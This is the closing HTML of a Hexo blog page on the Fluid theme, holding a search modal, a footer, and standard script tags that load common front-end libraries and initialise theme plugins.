      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <span> © 2023 </span> <a href="https://b11c.github.io" target="_blank" rel="nofollow noopener"><span>b11c</span></a> <span>Powered by</span> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
<span> & </span> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
